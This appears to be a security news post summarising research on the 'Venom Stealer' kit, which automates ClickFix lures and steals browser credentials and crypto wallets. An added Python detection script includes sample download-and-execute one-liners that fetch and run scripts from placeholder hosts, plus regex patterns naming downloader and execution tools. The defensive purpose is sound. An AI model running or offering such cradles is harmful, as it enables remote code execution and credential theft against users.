A new commodity stealer kit called “Venom Stealer” builds ClickFix social engineering into its operator panel, allowing threat actors to automate ClickFix attacks, according to researchers at BlackFog. ClickFix is a social engineering technique that tricks users into copying a malicious command and running it themselves, typically through the Windows Run dialog or a terminal, usually resulting in malware installation.
“Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting,” BlackFog explains. “It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running. The developer, operating under the handle ‘VenomStealer,’ sells access as a subscription ($250/month to $1,800 lifetime) with a vetted application process, Telegram-based licensing, and a 15% affiliate program.”
ClickFix attacks are more likely to evade detection by security tools because the malicious action is user-initiated: the shell that runs the pasted command is spawned by explorer.exe or the user's terminal rather than by a browser, mail client or Office document, so detection logic keyed on a suspicious parent process never fires. The activity is not invisible, though. The pasted command still appears in process-creation telemetry as a shell launched from a user-facing parent with a download-and-execute command line, and on Windows the Run dialog records it in the RunMRU registry key, so detections can be keyed on those artifacts instead.
“The infection begins when a target lands on a ClickFix page hosted by the operator,” the researchers write. “Venom ships four templates per platform (Windows and macOS): a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, paste a command, and press Enter. Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships.”
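The detection gap the researchers describe above, demonstrated on constructed process-creation events. This is an added example written for this summary, not code from BlackFog or from the Venom kit: the event fields are modelled loosely on Sysmon Event ID 1 style records, the hostnames, paths and URLs (all under example.invalid) are made up, and the rules are illustrative rather than a complete ClickFix signature. The first rule is the conventional "Office spawned a shell" heuristic; the second keys on what ClickFix actually leaves behind: a shell launched from explorer.exe or an interactive shell with a download cradle and an execution primitive on the same command line.

```python
"""Process-creation rules for the ClickFix pattern (Windows Run dialog and macOS Terminal)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-start record; field names are assumptions, not a vendor schema."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not real logs). Hostnames, paths and URLs are made up.
EVENTS = [
    # 1. classic maldoc chain: Word spawns PowerShell with an encoded command
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA..."),
    # 2. ClickFix on Windows: target pasted the command into the Run dialog (Win+R),
    #    so explorer.exe is the parent and the launch looks user-initiated
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w h -c "irm https://captcha-verify.example.invalid/v.ps1 | iex"'),
    # 3. benign: a user opened PowerShell from the Start menu and listed a folder
    ProcEvent("ws03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -NoExit -Command "Get-ChildItem C:\\Logs"'),
    # 4. ClickFix on macOS: target pasted a curl-to-shell one-liner into Terminal (zsh)
    ProcEvent("mac01", "/bin/zsh", "/bin/bash",
              'bash -c "$(curl -fsSL https://update.example.invalid/fix.sh)"'),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_LAUNCHERS = {"explorer.exe", "zsh", "bash", "sh", "terminal"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
          "bash", "sh", "zsh", "osascript"}

# Something that fetches remote content ...
DOWNLOADER = re.compile(
    r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget|certutil|bitsadmin)\b")
# ... combined with something that executes it: pipe to iex/sh, $(...) substitution,
# mshta, or an encoded PowerShell command.
EXECUTOR = re.compile(
    r"(?i)(?:\|\s*iex\b|invoke-expression|\|\s*(?:ba|z)?sh\b|\$\(|\bmshta\b|\s-enc(?:odedcommand)?\s)")


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of both path separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def office_spawned_shell(ev: ProcEvent) -> bool:
    """Conventional parent-child rule: an Office process launching a shell."""
    return basename(ev.parent_image) in OFFICE and basename(ev.image) in SHELLS


def clickfix_cradle(ev: ProcEvent) -> bool:
    """ClickFix rule: user-facing parent, shell child, download cradle plus executor."""
    return (basename(ev.parent_image) in USER_LAUNCHERS
            and basename(ev.image) in SHELLS
            and DOWNLOADER.search(ev.command_line) is not None
            and EXECUTOR.search(ev.command_line) is not None)


RULES = [("office_spawned_shell", office_spawned_shell),
         ("clickfix_cradle", clickfix_cradle)]


def triage(events) -> dict:
    """Map host -> list of rule names that fired, for hosts with at least one hit."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES if rule(ev)]
        if fired:
            hits[ev.host] = fired
    return hits


if __name__ == "__main__":
    for host, fired in triage(EVENTS).items():
        print(f"{host}: {', '.join(fired)}")
```

Run against the constructed events, the Office rule fires only on ws01, while both ClickFix launches (ws02 via the Run dialog, mac01 via Terminal) pass it untouched and the benign explorer.exe -> powershell.exe launch on ws03 stays quiet under both rules. On Windows the Run dialog history in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU gives a second, host-side artifact to corroborate a ws02-style hit.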
Once the payload runs, it scans the machine for sensitive information and sends it to the attackers without delay.
“The moment the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile. Chrome’s v10 and v20 password encryption is bypassed using a silent privilege escalation that extracts the decryption key without triggering any UAC dialog, leaving no forensic artifacts. System fingerprinting and browser extension inventories are captured alongside the credentials, giving cybercriminals a complete profile of each target.”
KnowBe4 enables your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
BlackFog has the story: Venom Stealer Turns ClickFix Into a Full Exfiltration Pipeline
